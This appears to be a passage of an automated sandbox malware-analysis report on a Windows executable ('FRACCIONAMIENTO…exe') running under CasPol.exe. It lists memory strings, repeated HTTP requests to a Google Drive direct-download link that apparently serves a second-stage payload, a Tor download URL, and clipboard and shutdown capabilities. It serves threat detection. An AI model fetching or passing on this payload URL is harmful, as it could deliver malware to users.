Source: CasPol.exe, 00000003.00000003.17282659739.0000000020111000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17283285158.000000002017E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
Source: CasPol.exe, 00000003.00000003.17012674069.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17013096892.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20371433769.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://doc-0c-74-docs.googleusercontent.com/
Source: CasPol.exe, 00000003.00000003.17013096892.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://doc-0c-74-docs.googleusercontent.com/1
Source: CasPol.exe, 00000003.00000003.17012674069.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://doc-0c-74-docs.googleusercontent.com/_
Source: CasPol.exe, 00000003.00000003.17013096892.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://doc-0c-74-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0al9jnh9
Source: CasPol.exe, 00000003.00000003.17013096892.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://doc-0c-74-docs.googleusercontent.com/t
Source: CasPol.exe, 00000003.00000003.15723880039.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: CasPol.exe, 00000003.00000003.16507086398.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17000172750.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16782720917.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16365039417.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17012674069.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15971309343.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15863927680.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16840295258.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16693592833.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15970658357.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16241170310.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16161966863.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16929138845.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16611111513.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16060615492.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17006207627.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16303043458.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/0
Source: CasPol.exe, 00000003.00000003.16365039417.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17006207627.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/:
Source: CasPol.exe, 00000003.00000003.16507086398.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17000172750.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16782720917.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16365039417.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17012674069.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15971309343.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15863927680.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16840295258.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16693592833.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15970658357.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16241170310.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16161966863.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16929138845.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15818747013.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16611111513.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16060615492.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17006207627.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16303043458.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15818032084.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/H
Source: CasPol.exe, 00000003.00000002.20371041773.0000000000E53000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/P
Source: CasPol.exe, 00000003.00000003.15971309343.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15970658357.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16241170310.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16161966863.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16060615492.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/R
Source: CasPol.exe, 00000003.00000003.17000172750.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16840295258.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16929138845.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17006207627.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/_1
Source: CasPol.exe, 00000003.00000003.16507086398.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17000172750.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16782720917.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17012674069.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16840295258.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16693592833.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16929138845.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16611111513.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17006207627.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/b
Source: CasPol.exe, 00000003.00000003.15971309343.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15863927680.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16840295258.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15970658357.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16929138845.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/ce.a2
Source: CasPol.exe, 00000003.00000002.20370411559.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16303043458.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15818032084.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15723880039.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E
Source: CasPol.exe, 00000003.00000003.16507086398.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16365039417.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15971309343.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16693592833.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15970658357.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16241170310.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16161966863.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16611111513.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16060615492.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16303043458.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E32859Z
Source: CasPol.exe, 00000003.00000003.15971309343.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15863927680.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15970658357.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16241170310.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16161966863.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15818747013.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16060615492.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16303043458.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15818032084.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E8
Source: CasPol.exe, 00000003.00000003.17000172750.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16782720917.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16365039417.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17012674069.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16840295258.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16693592833.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16241170310.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16929138845.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17006207627.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16303043458.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E8V2K0EcN7S0sk7E
Source: CasPol.exe, 00000003.00000003.17000172750.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16782720917.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17012674069.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16840295258.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16693592833.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16929138845.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16611111513.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17006207627.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E8V2K0EcN7S0sk7E8
Source: CasPol.exe, 00000003.00000003.16840295258.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16929138845.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E:P
Source: CasPol.exe, 00000003.00000003.16507086398.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17000172750.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16782720917.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17012674069.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15971309343.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15863927680.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16840295258.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16693592833.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15970658357.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16241170310.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16161966863.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16929138845.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15818747013.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15724350949.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16611111513.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16060615492.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17006207627.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15818032084.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15723880039.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7EX
Source: CasPol.exe, 00000003.00000002.20371210156.0000000000E69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7EZ
Source: CasPol.exe, 00000003.00000003.17000172750.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15863927680.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16693592833.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16929138845.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15818747013.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15818032084.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/z
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://eca.hinet.net/repository0
Source: CasPol.exe, 00000003.00000003.17282659739.0000000020111000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: CasPol.exe, 00000003.00000003.17280609313.00000000201DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: CasPol.exe, 00000003.00000003.17280609313.00000000201DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repository.luxtrust.lu0
Source: CasPol.exe, 00000003.00000003.16839976993.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16782400609.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16240989645.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16999808542.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16506792862.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16161065605.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16610080924.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16928461959.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15817800617.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16692720156.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15723729253.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16060307959.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16302066204.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15637036827.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16364711225.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15970356224.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/websearch/answer/86640
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://web.certicamara.com/marco-legal0Z
Source: CasPol.exe, 00000003.00000003.17282659739.0000000020111000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17283285158.000000002017E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.anf.es/AC/ACTAS/789230
Source: CasPol.exe, 00000003.00000003.17282659739.0000000020111000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17283285158.000000002017E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
Source: CasPol.exe, 00000003.00000003.17282659739.0000000020111000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17283285158.000000002017E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.anf.es/address/)1(0&
Source: CasPol.exe, 00000003.00000003.17280609313.00000000201DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.catcert.net/verarrel
Source: CasPol.exe, 00000003.00000003.17280609313.00000000201DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.catcert.net/verarrel05
Source: CasPol.exe, 00000003.00000003.16839976993.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16782400609.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16240989645.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16999808542.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16506792862.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16161065605.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16928461959.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15817800617.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16692720156.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15723729253.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16060307959.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16302066204.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16364711225.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15970356224.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: CasPol.exe, 00000003.00000003.17280609313.00000000201DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.netlock.hu/docs/
Source: CasPol.exe, 00000003.00000003.17282304601.0000000020183000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.netlock.net/docs
Source: CasPol.exe, 00000003.00000002.20396460069.000000001D291000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: CasPol.exe, 00000003.00000003.17282584231.00000000201D4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17281631999.00000000201D2000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17281402983.00000000201CA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17282106098.00000000201D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0al9jnh9ri2cnupcf3pilpptme4k7l2h/1650461475000/18066694053602596605/*/1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-74-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 142.250.186.174:443 -> 192.168.11.20:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49785 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 1_2_00405809
Uses 32bit PE files
Source: FRACCIONAMIENTO 1722403906461L.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Contains functionality to shutdown / reboot the system
